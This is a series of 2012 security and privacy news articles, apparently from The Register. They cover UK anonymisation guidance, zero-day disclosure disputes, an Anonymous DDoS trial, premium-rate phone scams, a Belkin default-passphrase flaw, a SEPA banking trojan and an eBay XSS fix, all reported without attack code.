STE WILLIAMS

Data anonymisation does not have to provide a 100 per cent guarantee to individuals’ privacy in order for it to be lawful for organisations to disclose the information, the UK’s data protection watchdog has said.

The view of the Information Commissioner’s Office (ICO), detailed in a new code of practice (108-page/2.15MB PDF) on anonymisation it has published, is that organisations that anonymise personal data can disclose that information even if there is a “remote” chance that the data can be matched with other information and lead to individuals being identified.

The ICO said that organisations that take action to mitigate the risk of anonymised data being used to identify individuals will be considered to have complied with the Data Protection Act (DPA) even if that action cannot eradicate the threat of the data being used to identify someone. The Act “does not require anonymisation to be completely risk free,” it added.

The data protection authority in Hamburg, known for its strong stance on privacy issues, told Out-Law.com that it too acknowledged that the “re-identification” of individuals, achieved from matching anonymised data with other information in the public domain or held by others, was impossible to prevent in all cases.

“Our general stance towards anonymisation is not far off of that of our British colleagues,” a spokesman for the Hamburg authority said. “German privacy law defines ‘rendering anonymous’ as ‘the alteration of personal data so that information concerning personal or material circumstances cannot be attributed to an identified or identifiable natural person or that such attribution would require a disproportionate amount of time, expense and effort’. It is therefore acknowledged that the absolute impossibility for re-identification in practice cannot always be achieved. Obviously this is addressed by the ICO in terms of a ‘remote risk’ remaining.”

Data protection law specialist Marc Dautlich of Pinsent Masons said that “The code is a very important one and has been published at a time when the Government is increasingly seeking to liberalise public sector-held datasets for research purposes, and when the private sector is increasingly exploiting data mining techniques for commercial purposes.”

In a statement the watchdog announced that a new “consortium” involving the University of Manchester, the University of Southampton, the Office for National Statistics and the government’s new Open Data Institute (ODI), would set up a new UK Anonymisation Network (UKAN). The Network will “enable sharing of good practice related to anonymisation, across the public and private sector” with information provided on a website, in case studies, clinics and seminars.

“What practical impact the new UK Anonymisation Network will have remains to be seen, but it could be a potentially valuable resource for organisations seeking guidance on their own anonymisation schemes,” Dautlich added.

Under its code, the ICO said that it was not always possible for personal data to be anonymised. It said that it was therefore “paramount” that data which could not be anonymised was kept secure. It said, though, that it is generally “easier” to disclose anonymised data than it is to disclose personal data because “fewer legal restrictions will apply”.

“There is clear legal authority for the view that where an organisation converts personal data into an anonymised form and discloses it, this will not amount to a disclosure of personal data,” the ICO said. “This is the case even though the organisation disclosing the data still holds the other data that would allow re-identification to take place.”

The ICO said that it can be difficult for organisations to know whether data they have anonymised can still be classed as ‘personal data’. It said, though, that a High Court ruling had made clear that “the risk of identification must be greater than remote and reasonably likely for information to be classed as personal data under the DPA”.

In “borderline” cases, organisations will have to assess the individual “circumstances of the case” to determine whether there is too great a risk that disclosing anonymised data would lead to individuals being identified, the ICO said.

“In borderline cases where the consequences of re-identification could be significant eg, because they would leave an individual open to damage, distress or financial loss, organisations should: seek data subject consent for the disclosure of the data, explaining its possible consequences; adopt a more rigorous form of risk analysis and anonymisation,” the ICO said. “In some scenarios, data should only be disclosed within a properly constituted closed community and with specific safeguards in place. In some particularly high-risk situations, it may not even be possible to share within a closed community.”

In cases where the risk of data matching is high, organisations can reduce that risk by only disclosing “parts of databases” in order to make “direct linkage more difficult”.

Under freedom of information (FOI) laws, organisations asked to disclose anonymised data will have to consider whether a “particular member of the public” has additional information that “could allow data to be combined to produce information that relates to and identifies a particular individual – and that is therefore personal data,” the watchdog added.

The ICO said that organisations will generally not require the consent of individuals to disclose anonymised data, but warned that it may not always be appropriate to disclose such information if there is a risk that an “educated guess” can be made as to the identity of the person whose data is anonymised where that “leads to the misidentification of an individual”.

The watchdog laid out a number of different safeguards that organisations should put in place in order to limit the access of people to anonymised datasets. It added that organisations anonymising personal information “need an effective and comprehensive governance structure” and that they should carry out “re-identification testing … to detect and deal with re-identification vulnerabilities”.

The ICO said that organisations that adhere to its recommendations should have a “reasonable degree of confidence” that their “publication of anonymised data will not lead to an inappropriate disclosure of personal data – through ‘re-identification’”.

Technology law specialist Luke Scanlon of Pinsent Masons, the law firm behind Out-Law.com, said that the watchdogs’ stance on anonymisation was “practical” but questioned whether it was consistent with wording in the EU’s Data Protection Directive.

A recital of the EU’s Data Protection Directive states that the “principles of protection must apply to any information concerning an identified or identifiable person” and that to “determine whether a person is identifiable, account should be taken of all the means likely reasonably to be used either by the controller or by any other person to identify the said person”.

However, the recital also states that “the principles of protection shall not apply to data rendered anonymous in such a way that the data subject is no longer identifiable”. It further adds that “codes of conduct … may be a useful instrument for providing guidance as to the ways in which data may be rendered anonymous and retained in a form in which identification of the data subject is no longer possible”.

“The recital appears to place the non-identifiability of the individual in absolute terms,” Scanlon said. “There is no indication in the recital which indicates that the principles of protection would not apply if an individual is only no longer ‘reasonably’ identifiable or in circumstances where there is a remote risk of identifiability.”

“Organisations therefore should remain cautious when using anonymised data, particularly if the use of such data would be in European jurisdictions other than the UK, wherever a conclusion can be drawn that there is a remote risk of identifiability,” he said.

The privacy watchdog for the German region of Schleswig-Holstein – the Independent Centre for Privacy Protection (ICPP) – which has been vocal on a number of data protection issues, told Out-Law.com that it was its view that both present and future risks must be taken into account when assessing the decision to disclose anonymised data.

“The [German] legal commentary argues that in some cases (similar to the ICO) 100 per cent anonymity is not possible to achieve, but that the risk has to be minimal,” Marit Hansen, deputy Privacy Information Commissioner in Schleswig-Holstein said.

“Further, the legal commentary demands that the available knowledge (whether lawfully available or not) has to be taken into account for assessing the possible risks of re-identification. It also stresses that the assessment result may change over time, eg, if new methods become available to link information,” she said.

“This may influence the way how to treat anonymised data: If you publish data on the internet that have been anonymised and are sufficiently protected against re-identification at one point in time, a later assessment may reveal that the protection may not be regarded adequate anymore. But then harm may already be done, and it would not be sufficient to delete the data (copies may be available, the re-identification may have been conducted already). This means that in our point of view anonymisation does not only mean to assess the risk once, but also to think of future risks, act accordingly (eg, to refrain from publishing these data on the internet) and assess the risk again if the conditions may have changed,” Hansen said.

Copyright © 2012, Out-Law.com

Out-Law.com is part of international law firm Pinsent Masons.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/26/anonymising_data_does_not_guarantee_privacy/

A Georgian security researcher is due to present details of an unpatched vulnerability in Google’s Chrome browser at the Malcon security conference in India over the weekend.

Years ago the circumstances of Ucha Gobejishvili’s presentation would hardly have raised an eyebrow but that was before Google began offering up to $60,000 in bug bounties for the low-down on most serious, remotely exploitable bugs in its Chrome web browser software.

Gobejishvili has apparently forgone potential financial rewards by leaving Google in the dark before unwrapping a remotely exploitable hole in the Chrome web browser, which reportedly involves a critical vulnerability in a Chrome DLL. More details are due to emerge at a presentation by Gobejishvili at the International Malware Conference (MalCon) in New Delhi on Saturday (24 November).

Conference notes say that the presentation, entitled Project Calypso, Art of Infection, will cover browser exploitation methodologies and focus on the aforementioned Chrome zero-day vulnerability.

Ucha Gobejishvili, 19, is described as system administrator at a small firm who is active as a penetration tester and vulnerability researcher. Files on Packet Storm suggest that Gobejishvili has carried out research on a Firefox 13.0 remote denial of service exploit and he has also been linked with the discovery of a cross-site scripting flaw on Skype’s webstore earlier this year.

Gobejishvili told Security Ledger that he had no plans to release proof of concept code for the Chrome exploit on Windows systems he claims to have discovered. He says he’s holding off on publishing details because the issue is dangerous, though paradoxically he doesn’t seem to be working with Google in helping to develop a fix. He doesn’t appear to be working with exploit brokers either. Gobejishvili’s general reticence is shrouded in some mystery.

Google is aware of Gobejishvili’s claims, although it apparently hasn’t been in touch with him directly. Pending more details, Google (much like any other interested party) is only able to monitor the situation and await further developments. We’re awaiting word from the internet giant’s Indian arm and will update this story as and when we hear more.

Malcon promises to be an interesting conference all round, with teenage security research prodigies playing a central role in more ways than one. Gobejishvili will share the stage with Shantanu Gawde, 16, who is due to present a demo of the first Windows Mobile 8 malware. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/mystery_chrome_0_day/

The trial of a British university student accused of participating in attacks by hacktivist collective Anonymous against the websites of PayPal and others has begun in London.

Prosecutors say Christopher Weatherhead, 22, was studying at Northampton University when he allegedly took part in “Operation Payback”, the packet-flooding campaign against financial services firms that suspended payment processing of donations to WikiLeaks after the whistle-blowing site began publishing leaked US diplomatic cables in late 2010. Weatherhead denies one count of conspiracy to impair the operation of computers between 1 August 2010 and 27 January last year arising from the alleged computer hacking attacks.

A jury at Southwark Crown Court were told Ashley Rhodes, 27, from Camberwell, south London; Peter Gibson, 24, from Hartlepool; and an 18-year-old male had already pleaded guilty to the charge, the BBC reports.

Sandip Patel, prosecuting, said that attacks by Anonymous hackers had cost PayPal £3.5m ($5.5m) and forced it to draft in 100 staff from parent firm eBay in order to keep its website up and running during a series of sustained attacks over several weeks. The payment-processing firm was also obliged to buy additional hardware and services in the aftermath of the attacks. These DDoS assaults were launched using the Low Orbit Ion Canon (LOIC) packet-flooding tool favoured by Anonymous at the time, The Guardian adds.

Patel said the Operation Payback attacks started out targeting firms known to oppose copyright piracy (such as Ministry of Sound nightclub, the British Recorded Music Industry and the International Federation of the Phonographic Industry) before switching targets to concentrate DDoS assaults on payment processing firms such as PayPal and MasterCard – which had pulled the plug on WikiLeaks, The Daily Telegraph reports.

Weatherhead, who allegedly used the online handle Nerdo, was alleged to have been among a small group of leaders on an IRC channel (AnonOps) used by Anonymous that selected targets, according to the prosecution.

“It is the prosecution case that Christopher Weatherhead, the defendant, is a cyber-attacker and that he, and others like him, waged a sophisticated and orchestrated campaign of online attacks that paralysed a series of targeted computer systems belonging to companies to which they took issue with, for whatever reason, and those attacks caused unprecedented harm,” Patel added, the BBC reports.

He claimed Anonymous was a group that represents the “dark side” of the internet, who “split into organised and co-ordinated attacks almost along military lines”.

Weatherhead was described in court as the network administrator for the AnonOps group. The prosecution alleged he had set up and run the website for the group under the false name Moses Gustavsson. Patel alleged that the defendant had contracted services from a Russian ISP called Heihachi – which the prosecutor described as a “safe haven” for cybercrime.

The defendant allegedly discussed plans to attack the Bank of America and GM Legal, a law firm involved in anti-piracy work, before his home was raided and equipment seized in January 2011.

The trial continues. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/anon_ddos_trial_oppayback/

Premium-rate call regulator PhonePayPlus has fined Red Play Media £50,000 for using Adword adverts to trick surfers into using premium-rate numbers to call non-premium services.

Red Play Media bought up Adwords, and Bing equivalents, to place links alongside searches for “NHS Direct” or similar. Clicking on the advert brings up a nice big phone number which, if dialled, will cost the caller £1.53 a minute as it offers to read out the real phone number or put the caller through (at the £1.53-a-minute rate), which was enough to garner 15 complaints and trigger the fine.

All companies using premium-rate phone lines are required to register with PhonePayPlus, which regulates their behaviour and investigates complaints, though not always as quickly as one might hope. The sites being run by Red Play Media – callerhelp.co.uk and phonenumber.co.uk – had been garnering complaints since December last year, with The Guardian reporting on the scam, and naming the companies, back in March.

And the practice is still endemic – type “tax office number” into Google and you’ll get two ads for fastphonenumbers.co.uk and easyphonenumbers.co.uk, both of which belong to Square1 Communications Limited and rely on the small print to keep them legitimate:

An entirely legitimate service for those who don’t want to call 0845 300 0627… click for small-print-friendly version

Wayback Machine archives for the Red Play Media websites indicate the company wasn’t always so assiduous about mentioning its rates, and the fact that it wasn’t affiliated with the service being called, but any service generating customer complaints can trigger a PhonePayPlus investigation.

Red Play Media was not the only firm doing this, but unlike the rules-abiding Square1, which only targeted those seeking tax advice, Red Play Media bought Adwords for “NHS Direct” and various hospitals – which meant it was was deliberately targeting vulnerable groups who might not be thinking entirely clearly while Googling for emergency aid, also against the PhonePayPlus rules.

So thanks to PhonePlayPlus, those searching for a hospital – or Wonga.com (which Red Play Media also bought) – will be safe until the next buyer steps up, but those looking to call their local tax office should still dial with care. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/adwords_scam/

Malta-based security start-up ReVuln claims to have uncovered a raft of vulnerabilities in industrial control kit from many leading manufacturers.

ReVuln released a video depicting zero-day exploits against SCADA* equipment from Siemens, General Electric, Schneider Electric, ABB/Rockwell and others. The unpatched flaws are all server-side and remotely exploitable by hackers, according to ReVuln.

No technical details were provided, so the claims of unpatched security flaws can’t be independently verified. Rather than reporting the flaws to vendors, ReVuln is offering to sell details of its discoveries to potential customers, a spokesman for the firm told El Reg.

“We sell our 0-day vulnerabilities to our 0-day feed customers. Vendors who want to improve their security can request one of our consulting services.”

The most obvious customers for details on SCADA exploits, particularly in the wake of Stuxnet, are government agencies. ReVuln said it only accepts “trusted customers from reputable countries only”.

Like others in the emerging field of exploit-brokering, ReVuln avoids simply reporting security bugs to vendors as part of a vulnerability disclosure process. It also had little interest in bug-bounty programs of the type pioneered by the likes of Google and Mozilla, that are now gaining wider acceptance among IT vendors and others, such as PayPal.

“We don’t work for free,” a ReVuln spokesman explained. “We had several personal experiences in the past where vendors didn’t even say thanks for reporting a issue, or they try to underpay your research with bug-bounty programs that are not worth reporting issues to them.”

ReVuln’s website states the the start-up specialises in “software and hardware assessment including vulnerability research for offensive and defensive security”, which would appear to put the firm in the same category as exploit intelligence services firms such as Vupen Security.

Vupen, which bills itself as a “leading provider of defensive offensive cyber security intelligence for government”, recently claimed it was sitting on a tasty Windows 8 exploit which it declined to share with Microsoft.

ReVuln said that instead of comparing it with Vupen, it makes more sense to compare with to firms that buy vulnerabilities and report them to the vendors.

“There are several other companies outsourcing vulnerability research and reporting issues to the vendors after selling weaponized exploits to their customers. Their business model works because most of the people selling vulnerabilities to such companies are not aware of the real market value of the information they are selling, so they accept to sell their work for a very little amount of money,” the spokesman told us.

“On our side, we don’t buy vulnerabilities and all our research is made by our internal team, moreover we do not disclose vulnerability information to vendors.”

Last week Russian developer Positive Technologies said 40 per cent of SCADA systems “available from the internet” were hackable. The claim came just weeks after the balloon went up about flaws in CoDeSys, a popular development environment for industrial control systems, used by score of manufacturers.

Kaspersky Lab, the Russian security firm that has been applauded for its research into Stuxnet and other SCADA nasties, recently announced it was developing an operating system designed to make industrial control systems less vulnerable to the sort of attacks ReVuln boasts it has discovered.

The volume of SCADA vulnerabilities being uncovered makes ReVuln claims, which would have been considered fanciful two years ago, more than credible – even though they remain unproven.

Game on

Last week ReVuln said it had discovered a remote code vulnerability in the CryEngine 3 game engine and a server-side bug involving Call of Duty: Modern Warfare 3 that might lend itself towards running denial of service attacks against game servers.

ReVuln’s paper (PDF) on the Call of Duty bug explains the issue in some depth while a video of the game engine vulnerability is far less forthcoming, other than classifying the exploit as arising from a heap spray vulnerability.

“The security hole in CryENGINE 3 is an example of 0-day vulnerability affecting the server-side part of games using game engines,” a ReVuln spokesman explained. “Basically by exploiting such hole it’s possible to compromise remote servers, and get complete control over them. We also discovered a 0-day vulnerability in Call Of Duty: Modern Warfare 3, which can be exploited to take down all the online servers at once.

“Please note that we didn’t provide any public exploit or proof-of-concept code,” he added.

The start-up said its security research covers many different fields, positioning its interest in looking at the security as far from a hobby or side-project.

“Games have a huge market, and there is interest from game companies in game security to improve their level of security,” ReVuln explained. ®

* SCADA systems are used to monitor and control industrial processes, infrastructure, and facility-based processes – such as those of the Iranian nuclear plant attacked in 2010.

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/scada_vulns/

Brit spook central GCHQ can’t decipher a coded message found on a pigeon that died trying to deliver the missive during WWII, and may have to turn to the public for help.

The remains of the bird, found by David Martin in his chimney in Surrey, had a secret message attached – 27 handwritten blocks of code.

The pigeon is reckoned to have flown from Nazi-occupied France, possibly during the D-Day invasions, in June of 1944, and codebreakers at the intelligence agency have been trying to figure out what its message says.

But the problem is that the code could be a one-off encryption, which only the sender and the recipient would have had a key for.

“We didn’t really hold out any hopes we would be able to read the message because the sort of codes that were constructed to be used during operations were designed only to be able to be read by the senders and the recipients,” GCHQ historian Tony, who asked that only his first name be used, told the BBC.

“Unless you get rather more idea than we have of who actually sent this message and who it was sent to, we are not going to find out what the underlying code being used was.”

The code could also have been based on a specific codebook put together for one mission that allowed the maximum information about that operation to be sent in the shortest possible message. If the codebook has since been destroyed, that would also make the encryption practically unbreakable.

Since the message is written on an official pad, historians don’t think it was sent by a spy – because a spook wouldn’t want to carry anything official around in case they were caught. In fact, the theory is that it was an Army units message, since the abbreviation “Sjt W Stot” is in the message and the Army used that old fashioned spelling of Serjeant.

Experts have also discredited the idea that the bird may have been on its way to codebreaking offices at Bletchley Park, as this was a station to decode German and Japanese messages, not somewhere British military were regularly sending communications.

GCHQ has been able to narrow it down a small bit by pigeon identification numbers. Each of the 250,000 or so birds used as messengers during the war were given an ID number, but this message contains two of these numbers and the agency is unsure which one relates to the pigeon found in the chimney.

Some help from the public could give GCHQ the contextual information it needs to help decode the message, such as the identity of Sjt Stot and clues to the identities of the sender and recipient.

“There are still quite a lot of people alive who worked in communications centres during the war and who might have some knowledge about this and it would be very interesting if anyone did have information if they could put it in the pot and we could see if we could get any further with it,” Tony said. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/pigeon_wwii_code_unbreakable/

Israel’s deputy prime minister Silvan Shalom has become the latest victim of the escalating cyber conflict between Israel and Palestine after his social media accounts were hacked and used to issue pro-Palestine propaganda.

Shalom’s Facebook, Twitter, YouTube, Blogger and LinkedIn accounts were hacked by a pro-Palestine group known as ZCompany Hacking Crew (ZHC), The Times of India reported.

The group is said to have posted videos on Shalom’s YouTube account depicting alleged Israeli atrocities against Palestine, while typical tweets included: “Get out of Palestine Israeli Zionists! Stop the attacks! End the slaughter of innocent people!!”

Although the social media accounts have now been reclaimed or taken offline, the hackers threatened to release private documents, contacts and even personal photos they claimed to have obtained by cracking Shalom’s Gmail and Picasa account.

The attacks are the latest in a continuing online theatre of conflict which sparked into life after Israeli forces launched Operation Pillar of Defense – pounding Gaza for over a week in what it claimed was a bid to target terror groups in the region that had been firing rockets at civilian targets within Israel.

Pro-Palestine hacktivists, including Anonymous, have sought to hit back, launching an estimated 100 million DDoS and web defacement attacks on Israeli web sites, according to Israeli newspaper Haaretz.

“In the first two days of the operation, we saw as many attempts to hack government websites as we usually see in a full month,” acting head of E-Government, Ofir Ben Avi, told the paper.

“The number of denial-of-service attacks is like nothing we’ve ever seen before.”

The Bank of Jerusalem’s online services were apparently taken out for a few hours, as was the Israel Defense Force’s blog, and hundreds of privately-owned Israeli web sites were defaced with pro-Hamas and Palestine messages.

However, for the most part Israel’s tech defences appear to have held firm, which one would expect from a country which allegedly had a hand in the development of the infamous Stuxnet and Flame malware.

Israel also had the upper hand in that Gaza’s internet and telecommunications networks run in and out of the country, giving Jerusalem the option of choking traffic in the region if it chooses to do so. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/israel_deputy_pm_social_media_hack_palestine/

The default WPA2-PSK passphrase used in some Belkin routers simply replaces a character of the device’s MAC address with another hecxadecimal character, according to security blogger Jakob Lell.

Lell describes the situation as follows:

Each of the eight characters of the default passphrase are created by substituting a corresponding hex-digit of the WAN MAC address using a static substitution table. Since the WAN MAC address is the WLAN MAC address + one or two (depending on the model), a wireless attacker can easily guess the wan mac address of the device and thus calculate the default WPA2 passphrase.

In either case, that’s problematic because it is possible to interrogate WiFi routers in order to learn their MAC address. Some models even advertise the address on the case of the device!

Lell’s revelation, which he says makes it possible to deduce passwords by drawing up a simple substitution table, means all an attacker needs to do to compromise a device is learn its MAC address and then spend a few minutes converting it into Hex.

Lell’s post on the topic suggests Belkin’s Surf N150 Model F7D1301v1, N900 Model F9K1104v1 and N450 Model F9K1105V2 are all susceptible to the attack.

He also writes that other routers may have the same issue, with only the substitution table differing.

“It is likely that other Belkin devices are affected as well,” Lell’s post says, adding that he has tried to engage the company on the issue since January 2012, without success. “Unfortunately, Belkin has not yet cooperated with us to fix the vulnerability and/or confirm a list of other affected devices,” he says.

Comment has been sought from Belkin. Belkin’s online press rooms in the USA and UK are silent on the issue.

The good news is that users need only change the password to make the poorly-coded default codes irrelevant. And we all know users are always diligent about that kind of chore and would never leave a system in an insecure state. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/wifi_passwords_deduced_from_mac_address/

Cybercrooks have developed a Trojan that targets high-value accounts linked to the European SEPA payments network.

The highly targeted malware-based scam is an extension of the ongoing Operation High Roller, according to Intel’s McAfee security division. Fraudsters have siphoned off tens of thousands from SEPA-linked accounts after infecting the computers of only a few dozen or so targets with accounts at two German banks.

Openly accessible logs on a control server behind the scam allowed McAfee researchers to work out that €61,000 in fraudulent SEPA transactions had been run against accounts held at just one of these banks.

SEPA (Single Euro Payments Area) is a payment-integration initiative of the European Union that covers all 27 EU member states, three European Economic Area countries (Iceland, Liechtenstein and Norway) and Switzerland and Monaco. It is similar to the Automated Clearing House banking network in the United States.

SEPA transactions make no distinction between domestic and cross-border transactions within the EU. So crooks only need to use money mule accounts as dropboxes for stolen funds and more sophisticated automated attacks can be applied than is possible with normal online banking fraud, as McAfee explains.

The latest attack targets the German banking industry with a targeted ATS [automated transfer system] designed with SEPA in mind. The malicious “webinjects” target two German banks with a specially crafted JavaScript payload deployed to about a dozen of their online banking customers that have SEPA as an option, keeping this attack very targeted in nature.

The targeted nature of such malware tends remain undetected for a time. Thus, these campaigns are hard to discover because they infect only dozens of customers, rather than hundreds or more.

The transaction server used in this attack is hosted in Moscow and hosts a separate control panel for each of the targeted banks. Although the control panel isn’t sophisticated, the machinery that acts behind the scenes is complex.

The ZeuS-style banking malware at the heart of the attack injects itself into the browser process of compromised machines before attempting to initiate withdrawals of between €1,000 and the SEPA transaction maximum of €100,000. The malware hides security alerts and transaction records.

These malware-based tricks are not new, and frauds against automated wire transactions have been seen before. The main significance of the latest attacks, as McAfee researchers point out, is that cybercrooks are beginning to target different types of payment channels, such as SEPA. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/23/sepa_trojan_scam/

eBay has resolved a cross-site scripting bug on its website that independent experts warned posed a significant risk of fraud to users of the auction site. The XSS flaw meant that, once logged into a seller account on eBay, an attacker could insert an XSS exploit code into a listing of an item for sale.

The XSS security flaw on eBay.com, discovered by Indian security researcher Shubham Upadhyay last week, created a means for hackers to inject attack code as “user-submitted content” in product listings. According to XSSed, the script insertion vulnerability provided a means to fling browser exploits and other nasties at surfers who viewed booby-trapped auctions.

And an independent security expert reckoned the vulnerability might even have lent itself to tricking victims into placing bids on auction items without their consent.

In a statement issued today, an eBay spokeswoman confirmed that the bug had been quashed and outlined eBay’s general approach to automatically scanning for XSS-related vulnerabilities on the online marketplace.

We were aware of this case and the issue has already been dealt with.

eBay has a tool that scans for such XSS vulnerabilities in user generated content. Like any automated tools, false positives and negatives do occur. Once we determine the user has violated eBay policy, we immediately remove the item and suspend the user account.

Scanning for cross-site scripting nasties is just one of the tools “numerous security detection tools” eBay applies in its ongoing fight to ensure the safety and security of our marketplace, she added. eBay said around 60 million items are listed on its UK site alone at any one time, with more than 17 million people visiting the site each month.

Dominique Karg, chief hacking officer at security management tools firm AlienVault, described the vulnerability as presenting a “high threat” to eBay users before it was fixed.

“If this hadn’t been fixed I’d consider this a high threat, specially considering the type of site,” Karg explained.

“Implications could range from abusing eBay’s trust and tricking [the users] into some download… to potentially playing with the auctions: placing bids on items the user doesn’t want / buyouts, accessing his/her account, selling fake stuff and similar.”

Cross Site Scripting (XSS) is a type of web server vulnerability that allows attackers to represent code as coming from the site they are visiting while it is actually being served from somewhere else entirely – potentially a hacker-controlled site. It is one of the most common categories of web security vulnerability, but the impact from XSS flaws varies greatly.

“In my experience XSS vulnerabilities always have gotten more attention than they deserve,” Karg explained. “First of all, you’re attacking other visitors, not the site itself.”

He added that there are two types of XSS vulnerability: persistent and reflected. The eBay vulnerability fell into the first, more serious, category, according to Karg, so it’s just as well it has been resolved sooner rather than later. ®

Article source: http://go.theregister.com/feed/www.theregister.co.uk/2012/11/22/ebay_plugs_xss_vuln/